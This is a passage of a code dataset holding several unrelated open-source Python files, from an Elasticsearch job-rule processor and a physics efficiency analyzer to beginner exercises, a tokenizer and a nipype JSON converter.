final_query['filtered']['filter']['and'].extend(filts)\n else:\n filts.append(final_query['filtered']['filter'])\n final_query['filtered']['filter'] = {\n 'and': filts,\n }\n else:\n final_query = {\n 'filtered': {\n 'query': query,\n 'filter': {\n 'and': filts,\n }\n }\n }\n final_query = { \"query\": final_query }\n logger.info(\"Final query: %s\" % json.dumps(final_query, indent=2))\n rule['query'] = final_query\n rule['query_string'] = json.dumps(final_query)\n\n\ndef evaluate_user_rules_job(job_id, es_url=app.conf.JOBS_ES_URL,\n alias=app.conf.STATUS_ALIAS,\n user_rules_idx=app.conf.USER_RULES_JOB_INDEX,\n job_queue=app.conf.JOBS_PROCESSED_QUEUE):\n \"\"\"Process all user rules in ES database and check if this job ID matches.\n If so, submit jobs. Otherwise do nothing.\"\"\"\n\n # sleep 10 seconds to allow ES documents to be indexed\n time.sleep(10)\n\n # get all enabled user rules\n query = { \"query\": { \"term\": { \"enabled\": True } } }\n r = requests.post('%s/%s/.percolator/_search?search_type=scan&scroll=10m&size=100' %\n (es_url, user_rules_idx), data=json.dumps(query))\n r.raise_for_status()\n scan_result = r.json()\n count = scan_result['hits']['total']\n scroll_id = scan_result['_scroll_id']\n rules = []\n while True:\n r = requests.post('%s/_search/scroll?scroll=10m' % es_url, data=scroll_id)\n res = r.json()\n scroll_id = res['_scroll_id']\n if len(res['hits']['hits']) == 0: break\n for hit in res['hits']['hits']:\n rules.append(hit['_source'])\n logger.info(\"Got %d enabled rules to check.\" % len(rules))\n\n # process rules\n for rule in rules:\n # sleep between queries\n time.sleep(1)\n\n # check for matching rules\n update_query(job_id, rule)\n final_qs = rule['query_string']\n r = requests.post('%s/job_status-current/job/_search' % es_url, data=final_qs)\n r.raise_for_status()\n result = r.json()\n if result['hits']['total'] == 0:\n logger.info(\"Rule '%s' didn't match for %s\" % (rule['rule_name'], job_id))\n continue\n else: doc_res = result['hits']['hits'][0]\n logger.info(\"Rule '%s' successfully matched for %s\" % (rule['rule_name'], job_id))\n #logger.info(\"doc_res: %s\" % json.dumps(doc_res, indent=2))\n\n # submit trigger task\n queue_job_trigger(doc_res, rule, es_url)\n logger.info(\"Trigger task submitted for %s: %s\" % (job_id, rule['job_type']))\n\n return True\n\n\n@backoff.on_exception(backoff.expo,\n socket.error,\n max_tries=backoff_max_tries,\n max_value=backoff_max_value)\ndef queue_finished_job(id):\n \"\"\"Queue job id for user_rules_job evaluation.\"\"\"\n\n payload = {\n 'type': 'user_rules_job',\n 'function': 'hysds.user_rules_job.evaluate_user_rules_job',\n 'args': [ id ],\n }\n hysds.task_worker.run_task.apply_async((payload,),\n queue=app.conf.USER_RULES_JOB_QUEUE)\n\n\n@backoff.on_exception(backoff.expo,\n socket.error,\n max_tries=backoff_max_tries,\n max_value=backoff_max_value)\ndef queue_job_trigger(doc_res, rule, es_url):\n \"\"\"Trigger job rule execution.\"\"\"\n\n payload = {\n 'type': 'user_rules_trigger',\n 'function': 'hysds_commons.job_utils.submit_mozart_job',\n 'args': [ doc_res, rule ],\n 'kwargs': { 'es_hysdsio_url': es_url },\n }\n hysds.task_worker.run_task.apply_async((payload,),\n queue=app.conf.USER_RULES_TRIGGER_QUEUE)\n","repo_name":"SpudButter/hysds","sub_path":"hysds/user_rules_job.py","file_name":"user_rules_job.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"50"} +{"seq_id":"42686096713","text":"import random\n\ndef jogar_adv(): \n\n print(\"*********************************\")\n print(\"Bem vindo ao jogo de Adivinhação!\")\n print(\"*********************************\")\n\n numero_secreto = random.randrange(1,101)\n tentativas = 0\n pontos = 1000\n\n print(numero_secreto)\n\n print(\"[1] FACIL [2] MÉDIO [3] DIFICIL \")\n nivel = int(input(\"Qual dificuldade voce deseja? \"))\n\n if(nivel == 1):\n tentativas = 12\n elif(nivel == 2):\n tentativas = 8\n else:\n tentativas = 5\n\n for rodada in range (1, tentativas + 1):\n print(\"tentativa {} de {}\".format (rodada, tentativas))\n chute_str = input(\"Digite um numero entre 1 e 100: \")\n print (\"Você Digitou \", chute_str)\n chute = int(chute_str)\n\n if( chute < 1 or chute > 100 ):\n print(\"Por favor, Digite um Numero de 1 a 100!\")\n continue\n\n acertou = numero_secreto == chute\n menor = chute < numero_secreto\n maior = chute > numero_secreto\n\n if(acertou):\n pontos_perdidos = abs(pontos - chute)\n pontos = pontos - pontos_perdidos\n print(\"Voce acertou e fez {} pontos!\".format(pontos))\n break \n else:\n if (maior):\n print(\"Voce Errou! seu numero foi maior que o numero secreto.\")\n elif (menor):\n print(\"Voce Errou! seu numero foi menor que o numero secreto.\")\n \n print(\"Fim Do Jogo!\")\n print(\"Obrigado por ter jogado!!!\")\n","repo_name":"ErycPerovani/Jogo_de_adivinhacao.py","sub_path":"adivinhacao.py","file_name":"adivinhacao.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27224684298","text":"import math\nimport ROOT as R\nimport DisplacedDimuons.Analysis.Selections as Selections\nimport DisplacedDimuons.Analysis.Analyzer as Analyzer\nimport DisplacedDimuons.Common.Utilities as Utilities\nfrom DisplacedDimuons.Analysis.AnalysisTools import matchedMuons, matchedDimuons\n\n# CONFIG stores the title and axis tuple so that the histograms can be declared in a loop\nHEADERS = ('XTITLE', 'AXES', 'LAMBDA', 'PRETTY', 'ACC_LAMBDA')\nVALUES = (\n ('pT' , 'p_{T} [GeV]' , (1500, 0., 1500.), lambda gmu : gmu.pt , 'p_{T}' , lambda sel: sel.allExcept('a_pT' )),\n ('eta' , '#eta' , (1000, -3., 3.), lambda gmu : gmu.eta , '#eta' , lambda sel: sel.allExcept('a_eta')),\n ('phi' , '#phi' , (1000, -math.pi, math.pi), lambda gmu : gmu.phi , '#phi' , lambda sel: sel ),\n ('Lxy' , 'L_{xy} [cm]' , (1000, 0., 800.), lambda gmu : gmu.Lxy() , 'L_{xy}' , lambda sel: sel.allExcept('a_Lxy')),\n ('d0' , 'd_{0} [cm]' , (1000, 0., 600.), lambda gmu : gmu.d0() , 'd_{0}' , lambda sel: sel ),\n ('dR' , '#DeltaR(#mu#mu)' , (1000, 0., 5.), lambda pair: pair[0].deltaR , '#DeltaR' , lambda sel: sel ),\n ('dphi', '#Delta#phi(#mu#mu)', (1000, -math.pi, math.pi), lambda pair: pair[0].p4.DeltaPhi(pair[1].p4), '#Delta#phi', lambda sel: sel ),\n)\nCONFIG = {}\nfor VAL in VALUES:\n KEY, VALS = VAL[0], VAL[1:]\n CONFIG[KEY] = dict(zip(HEADERS, VALS))\n\n#### CLASS AND FUNCTION DEFINITIONS ####\n# declare histograms for Analyzer class\ndef declareHistograms(self, PARAMS=None):\n for KEY in CONFIG:\n # one Eff, ChargeEff, and ChargeDen plot for each of DSA and RSA\n for MUON in ('DSA', 'RSA', 'REF'):\n TITLE = ';'+CONFIG[KEY]['XTITLE']+';'+MUON+' Reconstruction Efficiency'\n self.HistInit(MUON+'_'+KEY+'Eff' , TITLE, *CONFIG[KEY]['AXES'])\n TITLE = TITLE.replace('Reconstruction', 'Charge Reconstruction')\n self.HistInit(MUON+'_'+KEY+'ChargeEff', TITLE, *CONFIG[KEY]['AXES'])\n self.HistInit(MUON+'_'+KEY+'ChargeDen', '' , *CONFIG[KEY]['AXES'])\n\n # gen denominator plots, can reuse the axes\n self.HistInit(KEY+'Den' , '', *CONFIG[KEY]['AXES'])\n self.HistInit('REF_'+KEY+'Den' , '', *CONFIG[KEY]['AXES'])\n\n # descoping extra; not really needed anymore\n\n# internal loop function for Analyzer class\ndef analyze(self, E, PARAMS=None):\n if self.SP is None:\n raise Exception('[ANALYZER ERROR]: This script runs on signal only.')\n if self.TRIGGER:\n if not Selections.passedTrigger(E): return\n if '4Mu' in self.NAME:\n mu11, mu12, mu21, mu22, X1, X2, H, P, extramu = E.getPrimitives('GEN')\n genMuons = (mu11, mu12, mu21, mu22)\n genMuonPairs = ((mu11, mu12), (mu21, mu22))\n elif '2Mu2J' in self.NAME:\n mu1, mu2, j1, j2, X, XP, H, P, extramu = E.getPrimitives('GEN')\n genMuons = (mu1, mu2)\n genMuonPairs = ((mu1, mu2),)\n DSAmuons = E.getPrimitives('DSAMUON')\n RSAmuons = E.getPrimitives('RSAMUON')\n Dimuons = E.getPrimitives('DIMUON' )\n\n ALL = True if 'All' in self.CUTS else False\n # require reco muons to pass all selections\n if ALL:\n DSASelections = [Selections.MuonSelection(muon) for muon in DSAmuons]\n RSASelections = [Selections.MuonSelection(muon) for muon in RSAmuons]\n selectedDSAmuons = [mu for idx,mu in enumerate(DSAmuons) if DSASelections [idx]]\n selectedRSAmuons = [mu for idx,mu in enumerate(RSAmuons) if RSASelections [idx]]\n selectedDimuons = Dimuons\n\n # don't require reco muons to pass all selections\n else:\n selectedDSAmuons = DSAmuons\n selectedRSAmuons = RSAmuons\n selectedDimuons = Dimuons\n\n # loop over genMuons and fill histograms based on matches\n for genMuonPair in genMuonPairs:\n # genMuonMatches are a dictionary of the return tuple of length 3\n # DSA and RSA get a doDimuons=False argument so that no dimuon matching will be done\n genMuonMatches = {'DSA':None, 'RSA':None, 'REF':None}\n for MUON, recoMuons in (('DSA', selectedDSAmuons), ('RSA', selectedRSAmuons)):\n genMuonMatches[MUON] = matchedDimuons(genMuonPair, selectedDimuons, recoMuons, vertex='BS', doDimuons=False)\n for MUON in ('REF',):\n genMuonMatches['REF'] = matchedDimuons(genMuonPair, selectedDimuons)\n\n # now figure out the closest match, or None if they overlap\n # exitcode helps to make sure that both gen muons never match the same reco muon\n genMuonMatch = [{'DSA': None, 'RSA': None, 'REF': None}, {'DSA': None, 'RSA': None, 'REF': None}]\n for MUON in ('DSA', 'RSA'):\n dimuonMatches, muonMatches, exitcode = genMuonMatches[MUON]\n genMuonMatch[0][MUON], genMuonMatch[1][MUON] = exitcode.getBestGenMuonMatches(muonMatches)\n\n # matched refitted muons if there was at least one dimuon\n for MUON in ('REF',):\n dimuonMatches, muonMatches, exitcode = genMuonMatches['REF']\n if len(dimuonMatches) > 0:\n genMuonMatch[0]['REF'] = muonMatches[0][0]\n genMuonMatch[1]['REF'] = muonMatches[1][0]\n\n # now loop over the quantities and fill. split by whether it's a mu plot or a mumu plot\n genMuonPairSelection = Selections.AcceptanceSelection(genMuonPair)\n genMuonSelections = [Selections.AcceptanceSelection(genMuonPair[0]), Selections.AcceptanceSelection(genMuonPair[1])]\n for KEY in CONFIG:\n F = CONFIG[KEY]['LAMBDA']\n AF = CONFIG[KEY]['ACC_LAMBDA']\n\n # mumu plots: check if pair in acceptance, fill den, fill num if both match\n if KEY == 'dphi' or KEY == 'dR':\n if AF(genMuonPairSelection):\n self.HISTS[ KEY+'Den'].Fill(F(genMuonPair))\n self.HISTS['REF_'+KEY+'Den'].Fill(F(genMuonPair))\n\n for MUON in ('DSA', 'RSA', 'REF'):\n if genMuonMatch[0][MUON] is not None and genMuonMatch[1][MUON] is not None:\n self.EffPairFill(MUON, KEY, genMuonPair, genMuonMatch, F)\n\n # mu plots: for DSA and RSA, check if gen muon in acceptance, fill den, fill num if match\n # for REF, check if pair in acceptance, fill den, full num if both match\n else:\n for idx, genMuon in enumerate(genMuonPair):\n if AF(genMuonSelections[idx]):\n self.HISTS[KEY+'Den'].Fill(F(genMuon))\n\n for MUON in ('DSA', 'RSA'):\n if genMuonMatch[idx][MUON] is not None:\n self.EffSingleFill(MUON, KEY, genMuon, genMuonMatch, F, idx)\n\n if AF(genMuonPairSelection):\n self.HISTS['REF_'+KEY+'Den'].Fill(F(genMuon))\n\n for MUON in ('REF',):\n if genMuonMatch[0][MUON] is not None and genMuonMatch[1][MUON] is not None:\n self.EffSingleFill(MUON, KEY, genMuon, genMuonMatch, F, idx)\n\n# modular fill functions for use above: gen muon pair\ndef EffPairFill(self, MUON, KEY, genMuonPair, genMuonMatch, F):\n\n # first fill the eff plot; the numerator is the denominator for charge\n self.HISTS[MUON+'_'+KEY+'Eff' ].Fill(F(genMuonPair))\n self.HISTS[MUON+'_'+KEY+'ChargeDen'].Fill(F(genMuonPair))\n\n # THEN if the charges are the same, fill. Should be flat and close to 1.\n closestRecoMuons = [genMuonMatch[0][MUON]['muon'], genMuonMatch[1][MUON]['muon']]\n if genMuonPair[0].charge == closestRecoMuons[0].charge and genMuonPair[1].charge == closestRecoMuons[1].charge:\n self.HISTS[MUON+'_'+KEY+'ChargeEff'].Fill(F(genMuonPair))\n\n# modular fill functions for use above: individual gen muon\ndef EffSingleFill(self, MUON, KEY, genMuon, genMuonMatch, F, idx):\n\n # first fill the eff plot; the numerator is the denominator for charge\n self.HISTS[MUON+'_'+KEY+'Eff' ].Fill(F(genMuon))\n self.HISTS[MUON+'_'+KEY+'ChargeDen'].Fill(F(genMuon))\n\n # THEN if the charges are the same, fill. Should be flat and close to 1.\n closestRecoMuon = genMuonMatch[idx][MUON]['muon']\n if genMuon.charge == closestRecoMuon.charge:\n self.HISTS[MUON+'_'+KEY+'ChargeEff'].Fill(F(genMuon))\n\n#### RUN ANALYSIS ####\nif __name__ == '__main__':\n ARGS = Analyzer.PARSER.parse_args()\n Analyzer.setSample(ARGS)\n for METHOD in ('declareHistograms', 'analyze', 'EffPairFill', 'EffSingleFill'):\n setattr(Analyzer.Analyzer, METHOD, locals()[METHOD])\n analyzer = Analyzer.Analyzer(\n ARGS = ARGS,\n BRANCHKEYS = ('GEN', 'DSAMUON', 'RSAMUON', 'TRIGGER', 'DIMUON'),\n )\n analyzer.writeHistograms('roots/SignalRecoEffPlots{}{}_{{}}.root'.format('_Trig' if ARGS.TRIGGER else '', ARGS.CUTS))\n","repo_name":"rijuvenator/DisplacedDimuons","sub_path":"Analysis/analyzers/signalRecoEffPlots.py","file_name":"signalRecoEffPlots.py","file_ext":"py","file_size_in_byte":9116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"16586038152","text":"from turtle import *\r\ncolors = ['red', 'blue', 'brown', 'yellow', 'grey']\r\nfor i in range (5):\r\n color(colors[i], colors[i])\r\n begin_fill()\r\n for j in range (2):\r\n forward(50)\r\n left(90)\r\n forward(100)\r\n left(90)\r\n end_fill()\r\n forward(50)\r\n","repo_name":"dragon15098/bai-3","sub_path":"Turtle exercises 2.py","file_name":"Turtle exercises 2.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"29358591321","text":"# -*- coding: utf-8 -*-\n#Ekaum Soni\n#01/24/2022\n#\n#Preparing Data Sets\nimport csv, os\n\n\n# os.system('clear')\n# #Pandas is superior\n# import pandas as pd\n# insuranceCSV = pd.read_csv(\"insurance_data - insurance.csv\")\n\nfile = open('insurance_data - insurance.csv')\ninsuranceFile = csv.reader(file)\n\n\n#Bring up next value\nheader = next(insuranceFile)\n\ninsuranceData = []\n\n\n#Make one whole list out of every separate list\nfor row in insuranceFile:\n insuranceData.append(row)\n\n#Change Female to 0, Male to 1\n\nfor row in insuranceData:\n if row[1] == 'female':\n row[1] = 0\n if row[1] == 'male':\n row[1] = 1\n\n\nfor row in insuranceData:\n if row[4] == 'no':\n row[4] = 0\n if row[4] == 'yes':\n row[4] = 1\n\n#Add Insurance Cost to List\n\nfor row in insuranceData:\n insurance_cost = 250*int(row[0]) - 128*int(row[1]) + 370*float(row[2]) + 425*int(row[3]) + 24000*int(row[4]) - 12500\n insurance_cost = int(insurance_cost*100)/100\n row.append(insurance_cost)\n \n#Create List with averages of 4 regions\n\nSouthwest_Total = 0 \nNortheast_Total = 0 \nSoutheast_Total = 0\nNorthwest_Total = 0\ncountNE = 0 \ncountSE = 0\nCountNW = 0\nCountSW = 0\n\n\nfor row in insuranceData:\n if row[5] == 'northeast':\n Northeast_Total += row[7] \n countNE +=1\n NE_AVG = Northeast_Total/countNE\n if row[5] == 'southeast':\n Southeast_Total += row[7] \n countSE +=1\n SE_AVG = Southeast_Total/countSE\n if row[5] == 'northwest': \n Northwest_Total += row[7] \n CountNW += 1\n NW_AVG = Northwest_Total/CountNW\n if row[5] == 'southwest':\n Southwest_Total += row[7] \n CountSW += 1\n SW_AVG = Southwest_Total/CountSW\n\nRegion_AVG = [NE_AVG, SE_AVG, NW_AVG, SW_AVG]\n\n#Create a last with Only Females, and one with Only Males\nList_Female = []\nList_Male = []\n\nfor row in insuranceData:\n if row[1] == 'female':\n List_Female.append(row)\n if row[1] == 'male':\n List_Male.append(row)\n\n\n#Create a list with only Smokers, and one with non Smokers\nList_Smokers = []\nList_NonSmokers = []\n\n\nfor row in insuranceData:\n if row[4] == 'no':\n List_NonSmokers.append(row)\n if row[4] == 'yes':\n List_Smokers.append(row)\n\n","repo_name":"EkaumSoni/Ekaum_DataScience","sub_path":"InsuranceData.py","file_name":"InsuranceData.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22208990879","text":"from setuptools import setup, find_packages\nimport os\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name='odoo_helper',\n version='0.1.1',\n packages=find_packages(),\n url='https://github.com/dharmendrasha/odoo_python',\n license='GNU',\n author='dharmendra',\n author_email='dharmendrashah2002@yahoo.com',\n description='simple helper library for connecting database with odoo',\n keywords=\"odoo sdk api database package\",\n long_description=read('README.md'),\n long_description_content_type='text/markdown',\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Topic :: Database\",\n \"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)\",\n ],\n python_requires='>=3.6', # Minimum version requirement of the package\n install_requires=[] # Install other dependencies if any\n) \n","repo_name":"dharmendrasha/odoo_python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"16059112885","text":"from xtlib import errors\n\nclass Scanner():\n def __init__(self, text):\n self.text = text\n self.len = len(text)\n self.index = 0\n self.token_type = None\n self.token = None\n self.prev_index = 0\n #console.print(\"Scanner created, text=\", text)\n\n def scan(self, allow_extended_ids=True):\n self.prev_index = self.index\n \n text = self.text\n\n # skip spaces\n while self.index < self.len:\n if text[self.index] == ' ':\n self.index += 1\n else:\n break\n\n if self.index >= self.len:\n self.token_type = \"eol\"\n self.token = None\n else:\n ch = text[self.index]\n start = self.index\n self.index += 1\n\n if self.index < self.len:\n ch_next = text[self.index]\n else:\n ch_next = None\n\n if allow_extended_ids and ch.lower() in '~/_abcdefghijklmnopqrstuvwxyz*?$-' or (ch == \".\" and ch_next in [\".\", \"/\", \"\\\\\"]):\n # scan an ID or FILENAME or a WILDCARD or box-addr\n while self.index < self.len and text[self.index].lower() in '/@._-abcdefghijklmnopqrstuvwxyz0123456789?*:/\\\\':\n self.index += 1\n self.token_type = \"id\"\n self.token = text[start:self.index]\n elif not allow_extended_ids and ch.lower() in '_abcdefghijklmnopqrstuvwxyz': \n # scan a simple ID\n while self.index < self.len and text[self.index].lower() in '_abcdefghijklmnopqrstuvwxyz0123456789.-':\n self.index += 1\n self.token_type = \"id\"\n self.token = text[start:self.index]\n elif ch in '.0123456789':\n # scan a NUMBER\n while self.index < self.len and text[self.index] in '.0123456789':\n self.index += 1\n # allow for tags that start with a number but contain letters, and \"_\"\n ch = text[self.index] if self.index < self.len else None\n\n if ch and ch.isalpha() and not \".\" in text[start:self.index-1]:\n while self.index < self.len and text[self.index].lower() in '_abcdefghijklmnopqrstuvwxyz0123456789.-':\n self.index += 1 \n self.token_type = \"id\"\n self.token = text[start:self.index]\n else:\n self.token_type = \"number\"\n self.token = text[start:self.index]\n elif ch == '\"' or ch == \"'\":\n # scan a STRING\n quote = ch\n last_ch = \"\"\n while self.index < self.len:\n if text[self.index] == quote and last_ch != \"\\\\\":\n break\n last_ch = text[self.index]\n self.index += 1\n\n if text[self.index] != quote:\n errors.raise_error(\"Unterminated string at offset=\" + str(start) + \" in cmd: \" + text)\n\n self.token_type = \"string\"\n self.index += 1 # skip over the ending quote\n self.token = text[start+1:self.index-1]\n # un-embed contained quotes\n self.token = self.token.replace(\"\\\\\" + quote, quote)\n else:\n # scan a special char\n self.token_type = \"special\"\n self.token = ch\n if self.index < self.len:\n ch2 = ch + self.text[self.index]\n #console.print(\"ch2=\", ch2)\n if ch2 in [\"--\", \"<=\", \">=\", \"!=\", \"<>\", \"==\"]:\n self.index += 1\n self.token = ch2\n\n #console.print(\"scanner.scan returning=\", self.token, \", type=\", self.token_type)\n return self.token\n\n def save_state(self):\n state = Scanner(self.text)\n state.len = self.len\n state.index = self.index\n state.token_type = self.token_type\n state.token = self.token\n return state\n\n def restore_state(self, state):\n self.text = state.text\n self.len = state.len\n self.index = state.index\n self.token_type = state.token_type\n self.token = state.token\n\n def peek(self):\n # peek ahead 1 token\n state = self.save_state()\n tok = self.scan()\n state = self.restore_state(state)\n return tok\n\n def get_rest_of_text(self, include_current_token=False):\n if include_current_token:\n text = self.text[self.prev_index:]\n else:\n text = self.text[self.index:]\n\n # show input all processed\n self.token = text\n self.index = len(self.text)\n self.token_type = \"text\"\n\n self.text = text\n self.len = len(text)\n\n return text\n ","repo_name":"microsoft/ExperimentTools","sub_path":"xtlib/helpers/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"50"} +{"seq_id":"30332530033","text":"\"\"\" nipype2json.py\n\nMakes a Porcupine-compatible dictionary of nodes.\nCreated by Tomas Knapen (Free University, Amsterdam) &\nLukas Snoek (University of Amsterdam)\n\"\"\"\nimport inspect\nimport importlib\nimport os.path as op\nfrom copy import copy\n\n\ndef node2json(node, node_name=None, module=None, custom_node=False,\n module_path=None):\n \"\"\" Converts nipype nodes to Porcupine-compatible json-files.\n\n This function takes a Nipype node from a Python module and\n creates a Porcupine json-file.\n\n Parameters\n ----------\n node : Nipype Node object\n Nipype node to create a json-dict for.\n module : str\n Name of module in which node is contained.\n custom_node : bool\n Whether the node is a custom node or a node within\n the Nipype package.\n category : str\n Category of node (default: \"Custom\")\n module_path : str\n Path to module (only relevant for custom modules)\n \"\"\"\n\n if node_name is None and custom_node:\n raise ValueError(\"Cannot infer node-name from custom-nodes! Please \"\n \"set the argument `node_name` correctly!\")\n\n if node_name is None:\n node_name = _get_node_name(node)\n\n # node_name = node_name.replace('_', '\\_')\n\n all_inputs, mandatory_inputs = _get_inputs(node, custom_node)\n all_outputs = _get_outputs(node, custom_node)\n descr = _get_descr(node, node_name, custom_node)\n\n if custom_node:\n category = 'Custom'\n else:\n category = 'Nipype'\n\n this_category = [category]\n if module.split('.')[0] == 'algorithms':\n this_category.append('algorithms')\n\n if custom_node:\n this_category.append(module)\n else:\n this_category.append(module.split('.')[1])\n\n interface_name = copy(this_category)\n\n if not custom_node:\n sub_modules = _get_submodule(node)[1:]\n if sub_modules and sub_modules[0] != this_category[-1]:\n this_category.extend(sub_modules)\n\n web_url = _get_web_url(node, module, custom_node)\n import_statement = _get_import_statement(node, module, module_path)\n init_statement = _get_init_statement(interface_name, node_name, custom_node)\n\n titleBlock = {\n\n 'name': '%s.%s' % (interface_name[-1], node_name),\n 'web_url': web_url,\n 'code': [{\n 'language': 'Nipype',\n 'comment': descr,\n 'argument': {\n \"name\": init_statement,\n \"import\": import_statement\n }\n }]\n }\n\n titleBlock['code'].append({\n 'language': 'Docker',\n 'argument': {\n \"name\": \", \".join(interface_name)\n }\n })\n\n ports = []\n\n for inp in all_inputs:\n codeBlock = {\n 'language': 'Nipype',\n 'argument': {\n \"name\": inp\n }\n }\n\n is_mandatory = inp in mandatory_inputs\n\n port = {\n 'input': True,\n 'output': False,\n 'visible': True if is_mandatory else False,\n 'editable': True,\n 'name': inp,\n 'code': [codeBlock]\n }\n\n ports.append(port)\n\n ports = sorted(ports, reverse=True, key=lambda p: p['visible'])\n\n for outp in all_outputs:\n\n codeBlock = {\n 'language': 'Nipype',\n 'argument': {\n \"name\": outp\n }\n }\n\n port = {\n 'input': False,\n 'output': True,\n 'visible': True,\n 'editable': False,\n 'name': outp,\n 'code': [codeBlock]\n }\n ports.append(port)\n\n node_to_return = {\n 'category': this_category,\n 'title': titleBlock,\n 'ports': ports\n }\n return node_to_return\n\n\ndef _get_inputs(node, custom_node=True):\n\n all_inputs, mandatory_inputs = [], []\n if custom_node:\n TO_SKIP = ['function_str', 'trait_added', 'trait_modified',\n 'ignore_exception']\n all_inputs.extend([inp for inp in node.inputs.traits().keys()\n if inp not in TO_SKIP])\n mandatory_inputs.extend(all_inputs)\n else:\n all_inputs.extend([inp for inp in node.input_spec().traits().keys()\n if not inp.startswith('trait')])\n mandatory_inputs.extend(node.input_spec().traits(mandatory=True).keys())\n\n return all_inputs, mandatory_inputs\n\n\ndef _get_outputs(node, custom_node=True):\n\n if custom_node:\n TO_SKIP = ['trait_added', 'trait_modified']\n outputs = list(node.aggregate_outputs().traits().keys())\n all_outputs = [outp for outp in outputs\n if not outp in TO_SKIP]\n else:\n if hasattr(node, 'output_spec'):\n if node.output_spec is not None:\n all_outputs = [outp for outp in node.output_spec().traits().keys()\n if not outp.startswith('trait')]\n else:\n all_outputs = []\n else:\n all_outputs = []\n\n return all_outputs\n\n\ndef _get_descr(node, node_name, custom_node):\n\n if custom_node:\n descr = 'Custom interface wrapping function %s' % node_name\n else:\n if hasattr(node, 'help'):\n descr = node.help(returnhelp=True).splitlines()[0]\n else:\n descr = node.__name__\n\n return descr\n\n\ndef _get_web_url(node, module, custom_node):\n\n if custom_node:\n return ''\n\n is_algo = module.split('.')[0] == 'algorithms'\n\n web_url = 'https://nipype.readthedocs.io/en/latest/interfaces/generated/'\n\n all_sub_modules = _get_submodule(node)\n\n if is_algo or len(all_sub_modules) < 2:\n module = 'nipype.' + module\n\n web_url += module\n\n if len(all_sub_modules) > 1:\n\n if not is_algo:\n web_url += '/%s.html' % all_sub_modules[1]\n else:\n web_url += '.html'\n\n web_url += '#%s' % node.__name__.lower()\n else:\n web_url += '.html#%s' % node.__name__.lower()\n\n return web_url\n\n\ndef _get_node_name(node):\n\n return node.__name__\n\n\ndef _get_import_statement(node, module, module_path):\n\n try:\n importlib.import_module('nipype.' + module)\n import_statement = \"import nipype.%s as %s\" % (module, module.split('.')[-1])\n except ImportError:\n\n import_statement = ''\n if module_path is not None:\n import_statement += \"sys.path.append('%s')\\n\" % (op.abspath(op.dirname(module_path)))\n\n import_statement += 'import %s' % module\n\n return import_statement\n\n\ndef _get_init_statement(interface_name, node_name, custom_node):\n\n if custom_node:\n init_statement = interface_name[-1] + '.%s' % node_name\n else:\n init_statement = interface_name[-1] + '.%s()' % node_name\n\n return init_statement\n\n\ndef _get_submodule(node):\n\n module_tree = inspect.getmodule(node).__name__\n all_sub_modules = [n for n in module_tree.split('.')\n if n not in ('interfaces', 'nipype')]\n return all_sub_modules\n\n\ndef pyfunc2json():\n \"\"\" Experimental function to convert Python functions\n directly to Porcupine's JSON format (by converting it)\n first to a Nipype node. \"\"\"\n pass\n","repo_name":"spisakt/PUMI","sub_path":"porcupine/nipype2json.py","file_name":"nipype2json.py","file_ext":"py","file_size_in_byte":7184,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"50"} +{"seq_id":"38427173156","text":"from sklearn import datasets\n\nd = datasets.load_iris()\n\nprint(d.DESCR)\n\nfor i in range(0,len(d.data)):\n print(i+1,d.data[i],d.target[i])\n\nfrom sklearn import svm\ns = svm.SVC(gamma=0.1,C=10)\ns.fit(d.data,d.target)\n\nnew_d = [[6.4,3.2,6.0,2.5],[7.3,3.1,4.2,1.35]]\n\nres=s.predict(new_d)\nprint('새로운 2개 생물의 분류',res)\n\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\n\ndigit = datasets.load_digits()\n\nplt.figure(figsize = (5,5))\nplt.imshow(digit.images[0],cmap=plt.cm.gray_r,interpolation='nearest')\nplt.show()\nprint(digit.data[0])\nprint('이 숫자는',digit.target[0],'입니다')\n\nfrom sklearn import datasets\nfrom sklearn import svm\n\ndigit=datasets.load_digits()\n\ns=svm.SVC(gamma=0.1,C=10)\ns.fit(digit.data,digit.target)\n\nnew_d=[digit.data[0],digit.data[1],digit.data[2]]\nres=s.predict(new_d)\nprint('예측값은',res)\nprint('참값은',digit.target[0],digit.target[1],digit.target[2])\n\nres=s.predict(digit.data)\ncorrect=[i for i in range(len(res)) if res[i]==digit.target[i]]\naccuracy=len(correct)/len(res)\nprint('화소 특징을 사용했을 때 정확률=',accuracy*100,\"%\")","repo_name":"cherish10/Python","sub_path":"study/exam/2021_02_19.py","file_name":"2021_02_19.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"16642226869","text":"from lxml import etree\nimport requests\n\n__version__ = '1.0'\n__author__ = 'Richard Mihalovic'\n__contact__ = 'richard@mihalovic.sk'\n__licence__ = 'MIT'\n\n\nclass OrSr:\n def __load_html(self, url):\n r = requests.get(url)\n r.encoding = 'windows-1250'\n html = r.text\n r.connection.close() # fix: ResourceWarning: unclosed\n\n return html\n\n def hladaj_podla_ico(self, ico):\n url = 'http://orsr.sk/hladaj_ico.asp?SID=0&ICO=' + ico.replace(' ', '')\n html = self.__load_html(url)\n\n root = etree.fromstring(html, etree.HTMLParser())\n elements = root.xpath('//div[@class=\"bmk\"][1]/a/@href')\n if len(elements) > 1:\n detail_url = 'http://orsr.sk/' + elements[0]\n detail_html = self.__load_html(detail_url)\n return OrSrDetailParser().parse(detail_html)\n else:\n 